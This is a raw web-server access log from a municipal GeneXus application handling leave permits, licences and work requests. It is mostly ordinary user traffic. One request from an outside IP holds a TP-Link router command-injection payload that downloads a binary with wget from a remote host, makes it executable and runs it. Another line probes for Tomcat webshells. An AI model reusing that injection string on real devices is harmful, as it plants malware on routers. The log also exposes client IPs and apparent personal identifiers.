190.171.153.50 - - [26/Apr/2024:11:10:13 -0300] "POST /cormun/servlet/hlogin?cbbebfa704b618f1a35d3f268d345144,gx-no-cache=1714140498677 HTTP/1.1" 200 90
190.171.153.50 - - [26/Apr/2024:11:10:13 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.153.50 - - [26/Apr/2024:11:10:14 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4279
190.171.149.82 - - [26/Apr/2024:11:10:16 -0300] "POST /cormun/servlet/hlogin?dede8be9a212394745770644a9d1de99,gx-no-cache=1714140502555 HTTP/1.1" 200 90
190.171.149.82 - - [26/Apr/2024:11:10:16 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.149.82 - - [26/Apr/2024:11:10:17 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3933
190.171.153.50 - - [26/Apr/2024:11:10:30 -0300] "GET /cormun/servlet/trcontratosolicitud? HTTP/1.1" 200 14810
190.171.153.50 - - [26/Apr/2024:11:10:31 -0300] "GET /cormun/static/gxcfg.js?202211298514361 HTTP/1.1" 200 953
190.171.153.50 - - [26/Apr/2024:11:10:31 -0300] "GET /cormun/static/trcontratosolicitud.js?202211298514531 HTTP/1.1" 200 28237
190.171.153.50 - - [26/Apr/2024:11:10:31 -0300] "GET /cormun//static/Resources/PXToolsGridNew.png HTTP/1.1" 200 427
190.171.153.50 - - [26/Apr/2024:11:10:40 -0300] "POST /cormun/servlet/trcontratosolicitud?cbbebfa704b618f1a35d3f268d345144,,gx-no-cache=1714140525559 HTTP/1.1" 200 12640
190.171.153.50 - - [26/Apr/2024:11:10:41 -0300] "GET /cormun/static/Resources/PXToolsGridNext.gif HTTP/1.1" 200 369
190.171.153.50 - - [26/Apr/2024:11:10:41 -0300] "GET /cormun/static/Resources/PXToolsGridLast.gif HTTP/1.1" 200 370
190.171.149.90 - - [26/Apr/2024:11:11:59 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12181
190.171.149.90 - - [26/Apr/2024:11:12:03 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6703
190.171.149.90 - - [26/Apr/2024:11:12:11 -0300] "GET /cormun/servlet/permisogoce?0eb2d6e390d08a778d628b510607892a862b9c7fed2cd1bc7a539b7c89286ac825e9376883a8d852476cb679b3ab0e61008e070fe066af178bffe38dc37171d8,gx-no-cache=1714140618751 HTTP/1.1" 200 73
190.171.149.90 - - [26/Apr/2024:11:12:13 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.90 - - [26/Apr/2024:11:12:16 -0300] "GET /cormun/servlet/permisogoce?0eb2d6e390d08a778d628b510607892a6f67b87f2514e70a60566af16ccbe9bb18b06114bea1101233c863faaeb96379fc74e2299e4ffec800c9ce52d2a38551,gx-no-cache=1714140624199 HTTP/1.1" 200 47
190.171.149.74 - - [26/Apr/2024:11:12:18 -0300] "POST /cormun/servlet/trlicencias?6adad332ecf5e183f9d94306bedf12d1,,gx-no-cache=1714140621169 HTTP/1.1" 440 972
190.171.149.90 - - [26/Apr/2024:11:12:19 -0300] "POST /cormun/servlet/permisogoce?4ac9c98f6596bda64d58dafc17f800a9,INS,0,,,,gx-no-cache=1714140625694 HTTP/1.1" 200 93
190.171.149.90 - - [26/Apr/2024:11:12:19 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
190.171.149.90 - - [26/Apr/2024:11:12:19 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 12433
190.171.149.74 - - [26/Apr/2024:11:12:20 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6051
190.171.149.74 - - [26/Apr/2024:11:12:20 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
190.171.149.90 - - [26/Apr/2024:11:12:22 -0300] "GET /cormun/servlet/apermisogoceprn?7838254,P,20240426101019,PU HTTP/1.1" 200 1659
190.171.149.74 - - [26/Apr/2024:11:12:30 -0300] "POST /cormun/servlet/hlogin?c82052c7e42a3f8e323a217ad28e6842,gx-no-cache=1714140633020 HTTP/1.1" 200 90
190.171.149.74 - - [26/Apr/2024:11:12:30 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
190.171.149.74 - - [26/Apr/2024:11:12:30 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13205
190.171.153.50 - - [26/Apr/2024:11:12:48 -0300] "POST /cormun/servlet/trcontratosolicitud?cbbebfa704b618f1a35d3f268d345144,,gx-no-cache=1714140652771 HTTP/1.1" 200 6336
190.171.153.50 - - [26/Apr/2024:11:12:48 -0300] "GET /cormun/static/Resources/PXToolsGridFirst.gif HTTP/1.1" 200 379
190.171.153.50 - - [26/Apr/2024:11:12:48 -0300] "GET /cormun/static/Resources/PXToolsGridPrevious.gif HTTP/1.1" 200 369
190.171.153.50 - - [26/Apr/2024:11:13:07 -0300] "POST /cormun/servlet/trcontratosolicitud?cbbebfa704b618f1a35d3f268d345144,,gx-no-cache=1714140672497 HTTP/1.1" 200 12641
190.171.141.138 - - [26/Apr/2024:11:13:51 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.141.138 - - [26/Apr/2024:11:13:51 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1732
190.171.141.138 - - [26/Apr/2024:11:13:53 -0300] "POST /cormun/servlet/hlogin?c7e8ed9cabb7ba675d87ca4a81066df4,gx-no-cache=1714140719235 HTTP/1.1" 200 90
190.171.141.138 - - [26/Apr/2024:11:13:53 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
190.171.141.138 - - [26/Apr/2024:11:13:53 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4479
190.171.141.138 - - [26/Apr/2024:11:13:56 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14121
190.171.141.138 - - [26/Apr/2024:11:14:03 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7377
190.171.141.138 - - [26/Apr/2024:11:14:10 -0300] "GET /cormun/servlet/permisogoce?512285cd0683947171225f0336a74b84dee6131694d9bd5dc4202dd2ff7951a0c8734d67717c3c16026bbc55faa2d6c3ce3561a94a26dd7f0331f2b338206db0,gx-no-cache=1714140736419 HTTP/1.1" 200 80
190.171.141.138 - - [26/Apr/2024:11:14:10 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.141.138 - - [26/Apr/2024:11:14:20 -0300] "GET /cormun/servlet/permisogoce?512285cd0683947171225f0336a74b84c48755f3d1996da32e9712427a0ca5a4a088e7f78fe45611b03f96dc3b3e66d6efbd70fce6010872288872a13a0176b2,gx-no-cache=1714140746209 HTTP/1.1" 200 46
190.171.141.138 - - [26/Apr/2024:11:14:29 -0300] "POST /cormun/servlet/permisogoce?c7e8ed9cabb7ba675d87ca4a81066df4,INS,0,,,,gx-no-cache=1714140754387 HTTP/1.1" 200 93
190.171.141.138 - - [26/Apr/2024:11:14:29 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1011
190.171.141.138 - - [26/Apr/2024:11:14:29 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 14463
190.171.141.138 - - [26/Apr/2024:11:14:33 -0300] "GET /cormun/servlet/apermisogoceprn?10812480,P,20240426101219,PU HTTP/1.1" 200 1675
186.103.157.42 - - [26/Apr/2024:11:15:11 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
186.103.157.42 - - [26/Apr/2024:11:15:24 -0300] "POST /cormun/servlet/hlogin?034a8a6c9ede6ef513c27d5d6c86bd27,gx-no-cache=1714141647655 HTTP/1.1" 200 90
186.103.157.42 - - [26/Apr/2024:11:15:24 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
186.103.157.42 - - [26/Apr/2024:11:15:24 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3880
186.103.157.42 - - [26/Apr/2024:11:16:14 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 8514
190.171.153.50 - - [26/Apr/2024:11:16:19 -0300] "POST /cormun/servlet/hlogin?14898b76de1190b75a2972dc6cd4a971,gx-no-cache=1714140865154 HTTP/1.1" 200 90
190.171.153.50 - - [26/Apr/2024:11:16:19 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 7490
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/static/Resources/PXToolsGridFirstDisabled.gif HTTP/1.1" 304 -
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/static/Resources/PXToolsGridPreviousDisabled.gif HTTP/1.1" 304 -
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/static/Resources/PXToolsGridNextDisabled.gif HTTP/1.1" 304 -
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/static/Resources/PXToolsGridPage.gif HTTP/1.1" 304 -
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/static/Resources/PXToolsGridLastDisabled.gif HTTP/1.1" 304 -
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/static/Resources/desc.gif HTTP/1.1" 304 -
190.171.153.50 - - [26/Apr/2024:11:16:20 -0300] "GET /cormun/static/Resources/asc.gif HTTP/1.1" 304 -
186.103.157.42 - - [26/Apr/2024:11:16:21 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141704555 HTTP/1.1" 200 5781
186.103.157.42 - - [26/Apr/2024:11:16:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
186.103.157.42 - - [26/Apr/2024:11:16:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
186.103.157.42 - - [26/Apr/2024:11:16:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
186.103.157.42 - - [26/Apr/2024:11:16:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
186.103.157.42 - - [26/Apr/2024:11:16:31 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141714321 HTTP/1.1" 200 4554
186.103.157.42 - - [26/Apr/2024:11:16:31 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141714477 HTTP/1.1" 200 4322
174.138.2.203 - - [26/Apr/2024:11:16:37 -0300] "GET /tomcat.jsp HTTP/1.1" 404 981
174.138.2.203 - - [26/Apr/2024:11:16:38 -0300] "GET /dr/tomcat.jsp HTTP/1.1" 404 987
186.103.157.42 - - [26/Apr/2024:11:16:58 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141742113 HTTP/1.1" 200 10207
186.103.157.42 - - [26/Apr/2024:11:17:11 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141754962 HTTP/1.1" 200 107
186.103.157.42 - - [26/Apr/2024:11:17:11 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21319, HTTP/1.1" 200 10054
186.103.157.42 - - [26/Apr/2024:11:17:21 -0300] "POST /cormun/servlet/trsolicitudadjuntos?034a8a6c9ede6ef513c27d5d6c86bd27,2024,21319,,gx-no-cache=1714141765153 HTTP/1.1" 200 90
186.103.157.42 - - [26/Apr/2024:11:17:21 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 966
186.103.157.42 - - [26/Apr/2024:11:17:21 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 13053
186.103.157.42 - - [26/Apr/2024:11:17:29 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141772746 HTTP/1.1" 200 10185
186.103.157.42 - - [26/Apr/2024:11:17:33 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141776704 HTTP/1.1" 200 10185
190.171.141.106 - - [26/Apr/2024:11:18:00 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3322
190.171.141.106 - - [26/Apr/2024:11:18:01 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1732
190.171.141.106 - - [26/Apr/2024:11:18:01 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.141.106 - - [26/Apr/2024:11:18:09 -0300] "POST /cormun/servlet/hlogin?1a6bf927229afc8fe14d9640cbe7f745,gx-no-cache=1714140975747 HTTP/1.1" 200 90
190.171.141.106 - - [26/Apr/2024:11:18:09 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.141.106 - - [26/Apr/2024:11:18:09 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4272
186.103.157.42 - - [26/Apr/2024:11:18:20 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141824218 HTTP/1.1" 200 107
186.103.157.42 - - [26/Apr/2024:11:18:21 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21317, HTTP/1.1" 200 9972
186.103.157.42 - - [26/Apr/2024:11:18:24 -0300] "POST /cormun/servlet/trsolicitudadjuntos?034a8a6c9ede6ef513c27d5d6c86bd27,2024,21317,,gx-no-cache=1714141827584 HTTP/1.1" 200 90
186.103.157.42 - - [26/Apr/2024:11:18:24 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 966
186.103.157.42 - - [26/Apr/2024:11:18:24 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 13053
190.171.141.106 - - [26/Apr/2024:11:18:25 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13984
186.103.157.42 - - [26/Apr/2024:11:18:31 -0300] "POST /cormun/servlet/trsolicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,,gx-no-cache=1714141834610 HTTP/1.1" 200 107
186.103.157.42 - - [26/Apr/2024:11:18:31 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2024,21316, HTTP/1.1" 200 9970
186.103.157.42 - - [26/Apr/2024:11:18:34 -0300] "POST /cormun/servlet/trsolicitudadjuntos?034a8a6c9ede6ef513c27d5d6c86bd27,2024,21316,,gx-no-cache=1714141837448 HTTP/1.1" 200 90
186.103.157.42 - - [26/Apr/2024:11:18:34 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 965
186.103.157.42 - - [26/Apr/2024:11:18:34 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 13053
190.171.141.106 - - [26/Apr/2024:11:19:09 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
190.171.141.106 - - [26/Apr/2024:11:19:11 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
190.171.141.106 - - [26/Apr/2024:11:19:16 -0300] "POST /cormun/servlet/hlogin?8626a29fb0374e4e8bc04992c2ffc63b,gx-no-cache=1714141042888 HTTP/1.1" 200 90
190.171.141.106 - - [26/Apr/2024:11:19:16 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
190.171.141.106 - - [26/Apr/2024:11:19:17 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4272
186.103.157.42 - - [26/Apr/2024:11:19:26 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15870
186.103.157.42 - - [26/Apr/2024:11:19:26 -0300] "GET /cormun/static/gxcfg.js?20221129840861 HTTP/1.1" 200 953
186.103.157.42 - - [26/Apr/2024:11:19:26 -0300] "GET /cormun/static/solicitudot.js?20221129840983 HTTP/1.1" 200 74072
190.171.141.106 - - [26/Apr/2024:11:19:34 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13986
186.103.157.42 - - [26/Apr/2024:11:19:49 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1714141912191 HTTP/1.1" 200 4035
186.103.157.42 - - [26/Apr/2024:11:19:49 -0300] "POST /cormun/servlet/solicitudot?034a8a6c9ede6ef513c27d5d6c86bd27,INS,0,0,false,,gx-no-cache=1714141912452 HTTP/1.1" 200 12601
186.103.157.42 - - [26/Apr/2024:11:19:49 -0300] "GET /cormun/servlet/solicitudot?4ffb347278294c57b9dcbf186c86e7d5a0312c22d210375ba322cb3a8685ad884855ac121425491b4cb5e5ede2886e8e,gx-no-cache=1714141912561 HTTP/1.1" 200 30
181.212.40.185 - - [26/Apr/2024:11:19:54 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6027
181.212.40.185 - - [26/Apr/2024:11:19:54 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
181.212.40.185 - - [26/Apr/2024:11:19:54 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6023
181.212.40.185 - - [26/Apr/2024:11:20:06 -0300] "POST /cormun/servlet/hlogin?b80e5ad0841bee8c46045919f6c2b9bd,gx-no-cache=1714141091408 HTTP/1.1" 200 90
181.212.40.185 - - [26/Apr/2024:11:20:06 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
181.212.40.185 - - [26/Apr/2024:11:20:06 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 17305
45.142.182.92 - - [26/Apr/2024:11:20:08 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 1013
181.212.40.185 - - [26/Apr/2024:11:20:12 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7073
181.212.40.185 - - [26/Apr/2024:11:20:19 -0300] "GET /cormun/servlet/permisogoce?7f409d7c7801d819d0167060871c3ba004209d5c55d9f0749702d63682deabf82b24f3c182a5778951fe104f64fd81ef972bd21856304d7d3e213639335df679,gx-no-cache=1714141104649 HTTP/1.1" 200 79
181.212.40.185 - - [26/Apr/2024:11:20:20 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.40.185 - - [26/Apr/2024:11:20:33 -0300] "GET /cormun/servlet/permisogoce?7f409d7c7801d819d0167060871c3ba01c7e7492b4e1926991a7b266e93693885997f863d0c06547119d458ac22334d267cdb8e57cb25f9ac7692c9a7c9bb7fd,gx-no-cache=1714141118564 HTTP/1.1" 200 47
181.212.40.185 - - [26/Apr/2024:11:20:49 -0300] "POST /cormun/servlet/permisogoce?b80e5ad0841bee8c46045919f6c2b9bd,INS,0,,,,gx-no-cache=1714141134369 HTTP/1.1" 200 93
181.212.40.185 - - [26/Apr/2024:11:20:50 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1003
181.212.40.185 - - [26/Apr/2024:11:20:50 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 17629
190.171.141.106 - - [26/Apr/2024:11:20:53 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14609
181.212.40.185 - - [26/Apr/2024:11:20:54 -0300] "GET /cormun/servlet/trpermisosadjuntos?13947301,20240426101828,P, HTTP/1.1" 200 6525
181.212.40.185 - - [26/Apr/2024:11:20:58 -0300] "GET /cormun/servlet/permisosadjuntos?INS,13947301,P,20240426101828,, HTTP/1.1" 200 5848
181.212.40.185 - - [26/Apr/2024:11:20:59 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.40.185 - - [26/Apr/2024:11:21:08 -0300] "POST /cormun/servlet/permisosadjuntos?b80e5ad0841bee8c46045919f6c2b9bd,INS,13947301,P,20240426101828,, HTTP/1.1" 200 116
181.212.40.185 - - [26/Apr/2024:11:21:08 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1033
181.212.40.185 - - [26/Apr/2024:11:21:08 -0300] "GET /cormun/servlet/trpermisosadjuntos?13947301,20240426101828,P, HTTP/1.1" 200 7059
181.212.40.185 - - [26/Apr/2024:11:21:11 -0300] "POST /cormun/servlet/trpermisosadjuntos?b80e5ad0841bee8c46045919f6c2b9bd,13947301,20240426101828,P,,gx-no-cache=1714141156441 HTTP/1.1" 200 90
181.212.40.185 - - [26/Apr/2024:11:21:11 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 979
181.212.40.185 - - [26/Apr/2024:11:21:11 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 17625
181.212.40.185 - - [26/Apr/2024:11:21:22 -0300] "POST /cormun/servlet/trpermisosgoce?b80e5ad0841bee8c46045919f6c2b9bd,gx-no-cache=1714141167589 HTTP/1.1" 200 14733
181.212.40.185 - - [26/Apr/2024:11:21:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.40.185 - - [26/Apr/2024:11:21:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.40.185 - - [26/Apr/2024:11:21:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
181.212.40.185 - - [26/Apr/2024:11:21:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
181.212.40.185 - - [26/Apr/2024:11:21:29 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7073
181.212.47.137 - - [26/Apr/2024:11:21:33 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 10811
190.171.141.106 - - [26/Apr/2024:11:21:34 -0300] "GET /cormun/servlet/trpermisosadjuntos?15382659,20240424141458,P, HTTP/1.1" 200 7080
190.171.141.106 - - [26/Apr/2024:11:21:39 -0300] "GET /cormun/servlet/permisosadjuntos?INS,15382659,P,20240424141458,, HTTP/1.1" 200 5913
190.171.141.106 - - [26/Apr/2024:11:21:39 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.40.185 - - [26/Apr/2024:11:21:41 -0300] "GET /cormun/servlet/permisogoce?7f409d7c7801d819d0167060871c3ba00406e9bc97e3b95595c15d63b8dc62532b24f3c182a5778951fe104f64fd81ef972bd21856304d7d3e213639335df679,gx-no-cache=1714141187140 HTTP/1.1" 200 83
181.212.47.137 - - [26/Apr/2024:11:21:42 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 10803
190.171.141.106 - - [26/Apr/2024:11:21:45 -0300] "POST /cormun/servlet/permisosadjuntos?8626a29fb0374e4e8bc04992c2ffc63b,INS,15382659,P,20240424141458,,,gx-no-cache=1714141191411 HTTP/1.1" 200 93
190.171.141.106 - - [26/Apr/2024:11:21:45 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1036
190.171.141.106 - - [26/Apr/2024:11:21:45 -0300] "GET /cormun/servlet/trpermisosadjuntos?15382659,20240424141458,P, HTTP/1.1" 200 7157
181.212.47.137 - - [26/Apr/2024:11:21:48 -0300] "POST /cormun/servlet/trsolicitudgral?6b8129a46348904e5b6c87cbcbc3c5fe,,gx-no-cache=1714141204467 HTTP/1.1" 200 7742
190.171.141.106 - - [26/Apr/2024:11:21:49 -0300] "GET /cormun/servlet/permisosadjuntos?INS,15382659,P,20240424141458,, HTTP/1.1" 200 5911
190.171.141.106 - - [26/Apr/2024:11:21:49 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.106 - - [26/Apr/2024:11:21:51 -0300] "POST /cormun/servlet/permisosadjuntos?8626a29fb0374e4e8bc04992c2ffc63b,INS,15382659,P,20240424141458,,,gx-no-cache=1714141197744 HTTP/1.1" 200 93
190.171.141.106 - - [26/Apr/2024:11:21:51 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1036
190.171.141.106 - - [26/Apr/2024:11:21:51 -0300] "GET /cormun/servlet/trpermisosadjuntos?15382659,20240424141458,P, HTTP/1.1" 200 7158
181.212.47.137 - - [26/Apr/2024:11:21:52 -0300] "POST /cormun/servlet/trsolicitudgral?6b8129a46348904e5b6c87cbcbc3c5fe,,gx-no-cache=1714141208177 HTTP/1.1" 200 25958
181.212.40.185 - - [26/Apr/2024:11:21:53 -0300] "GET /cormun/servlet/permisogoce?7f409d7c7801d819d0167060871c3ba06459a14b08ad5ad8068c12e65ecfed62913612fd1f71d90459d95c5642bd7d6167cdb8e57cb25f9ac7692c9a7c9bb7fd,gx-no-cache=1714141198297 HTTP/1.1" 200 47
190.171.141.106 - - [26/Apr/2024:11:21:56 -0300] "GET /cormun/servlet/permisosadjuntos?INS,15382659,P,20240424141458,, HTTP/1.1" 200 5913
190.171.141.106 - - [26/Apr/2024:11:21:56 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.40.185 - - [26/Apr/2024:11:21:58 -0300] "POST /cormun/servlet/permisogoce?b80e5ad0841bee8c46045919f6c2b9bd,INS,0,,,,gx-no-cache=1714141203049 HTTP/1.1" 200 93
181.212.40.185 - - [26/Apr/2024:11:21:58 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1024
181.212.40.185 - - [26/Apr/2024:11:21:58 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1714141167589 HTTP/1.1" 200 17814
190.171.141.106 - - [26/Apr/2024:11:22:00 -0300] "GET /cormun/servlet/trpermisosadjuntos?15382659,20240424141458,P, HTTP/1.1" 200 7158
181.212.40.185 - - [26/Apr/2024:11:22:01 -0300] "GET /cormun/servlet/trpermisosadjuntos?16881448,20240426101945,P, HTTP/1.1" 200 6545
190.171.141.106 - - [26/Apr/2024:11:22:02 -0300] "GET /cormun/servlet/permisosadjuntos?INS,15382659,P,20240424141458,, HTTP/1.1" 200 5912
190.171.141.106 - - [26/Apr/2024:11:22:02 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.47.137 - - [26/Apr/2024:11:22:03 -0300] "POST /cormun/servlet/trsolicitudgral?6b8129a46348904e5b6c87cbcbc3c5fe,,gx-no-cache=1714141218920 HTTP/1.1" 200 25995
181.212.40.185 - - [26/Apr/2024:11:22:03 -0300] "GET /cormun/servlet/permisosadjuntos?INS,16881448,P,20240426101945,, HTTP/1.1" 200 5848
181.212.40.185 - - [26/Apr/2024:11:22:03 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
181.212.47.137 - - [26/Apr/2024:11:22:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.47.137 - - [26/Apr/2024:11:22:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.47.137 - - [26/Apr/2024:11:22:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
181.212.47.137 - - [26/Apr/2024:11:22:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [26/Apr/2024:11:22:04 -0300] "POST /cormun/servlet/permisosadjuntos?8626a29fb0374e4e8bc04992c2ffc63b,INS,15382659,P,20240424141458,,,gx-no-cache=1714141210120 HTTP/1.1" 200 93
190.171.141.106 - - [26/Apr/2024:11:22:04 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1036
190.171.141.106 - - [26/Apr/2024:11:22:04 -0300] "GET /cormun/servlet/trpermisosadjuntos?15382659,20240424141458,P, HTTP/1.1" 200 7158
190.171.141.106 - - [26/Apr/2024:11:22:08 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14622
181.212.47.137 - - [26/Apr/2024:11:22:12 -0300] "GET /cormun/servlet/trautorizarot? HTTP/1.1" 200 9566
181.212.40.185 - - [26/Apr/2024:11:22:13 -0300] "POST /cormun/servlet/permisosadjuntos?b80e5ad0841bee8c46045919f6c2b9bd,INS,16881448,P,20240426101945,, HTTP/1.1" 200 116
181.212.40.185 - - [26/Apr/2024:11:22:13 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1033
181.212.40.185 - - [26/Apr/2024:11:22:13 -0300] "GET /cormun/servlet/trpermisosadjuntos?16881448,20240426101945,P, HTTP/1.1" 200 7079
181.212.47.137 - - [26/Apr/2024:11:22:14 -0300] "POST /cormun/servlet/trautorizarot?6b8129a46348904e5b6c87cbcbc3c5fe,,gx-no-cache=1714141230915 HTTP/1.1" 200 5335
181.212.40.185 - - [26/Apr/2024:11:22:16 -0300] "POST /cormun/servlet/trpermisosadjuntos?b80e5ad0841bee8c46045919f6c2b9bd,16881448,20240426101945,P,,gx-no-cache=1714141221401 HTTP/1.1" 200 90
181.212.40.185 - - [26/Apr/2024:11:22:16 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1000
181.212.40.185 - - [26/Apr/2024:11:22:16 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1714141167589 HTTP/1.1" 200 17810
